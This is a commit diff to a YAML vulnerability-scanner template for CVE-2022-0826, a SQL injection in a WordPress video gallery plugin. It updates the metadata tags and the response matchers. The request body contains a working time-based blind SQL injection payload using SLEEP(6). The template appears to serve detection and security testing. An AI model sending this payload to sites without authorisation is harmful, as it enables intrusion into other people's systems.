Update CVE-2022-0826.yaml
parent
10159089ac
commit
bb4f42796f
|
@ -16,8 +16,8 @@ info:
|
|||
cve-id: CVE-2022-0826
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-video-gallery-free,unauth
|
||||
verified: true
|
||||
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wp-video-gallery-free,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -28,11 +28,12 @@ requests:
|
|||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- '(contains(body, "Registred videos :") || contains(body, "duplicate"))'
|
||||
condition: and
|
||||
- 'contains(body, "Registred videos :")'
|
||||
condition: and
|
||||
|
|
Loading…
Reference in New Issue